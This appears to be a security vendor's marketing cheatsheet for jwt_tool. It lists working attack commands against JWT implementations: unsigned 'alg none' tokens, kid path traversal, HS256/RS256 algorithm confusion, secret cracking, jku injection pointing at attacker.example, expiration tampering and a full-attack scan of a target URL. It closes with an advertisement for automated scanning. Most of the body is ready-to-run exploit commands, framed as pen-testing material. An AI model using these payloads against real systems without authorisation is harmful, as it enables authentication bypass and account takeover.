Cheatsheet

jwt_tool cheatsheet

The attack payloads that still work against production JWT implementations in 2026 — plus the TigerStrike scanners that catch each class before an attacker does.

01

none Algorithm Bypass

Many JWT libraries incorrectly accept {"alg":"none"} as a valid signature. The token is unsigned but the server trusts it anyway — classical authentication bypass.

jwt_tool -I -pc user -pv admin -S none
02

kid Header Injection

The kid (key ID) header tells the server which key to validate against. If the server reads kid from the token to construct a filesystem path, SQL query, or lookup — the token controls the key.

jwt_tool -I -hc kid -hv "../../../../dev/null" -S hs256 -p ""

# Alternative with injected path
jwt_tool -i -hc kid -hv "/dev/null" -s hs256 -p ""
03

HS256 → RS256 Algorithm Confusion

The server validates the token with whatever algorithm the token header specifies. Flip RS256 to HS256 and sign with the public key as HMAC secret — server validates successfully.

# Fetch public key
curl https://target.example/.well-known/jwks.json

# Confuse the algorithm
jwt_tool -X k -pk public.pem
04

Weak HS256 Secret Cracking

HS256 tokens are vulnerable to offline brute-force if the signing secret is weak. jwt_tool integrates dictionary cracking against the token.

jwt_tool -C -d wordlist.txt
05

jku / x5u Header Injection

jku and x5u point to the key / certificate URL. If the server fetches whatever URL the token says, host attacker-controlled keys and the server validates against them.

jwt_tool -I -hc jku -hv "https://attacker.example/jwks.json"
06

Expiration Bypass

Servers that ignore the exp claim, or that validate exp before signature, let old tokens live indefinitely. jwt_tool tampers with claims to test this.

jwt_tool -X i -I -pc exp -pv 9999999999
07

Full Scanning Mode

Run jwt_tool against a target in all-attack mode — issues every attack class against the token and reports what works. The one-shot workflow for pen testing engagements.

jwt_tool -t https://target.example/api/user -rc "Cookie: jwt=<token>" -M at

Stop running jwt_tool manually.

TigerStrike runs every JWT attack class automatically against your production JWTs on every release, chains JWT findings into attack paths, and produces compliance-ready evidence for SOC 2, ISO 27001, and PCI DSS auditors.

See all JWT scanners

Stop finding vulnerabilities manually

TigerStrike uses AI agents to continuously discover, validate, and exploit vulnerabilities across your applications — so your team can focus on fixing what matters.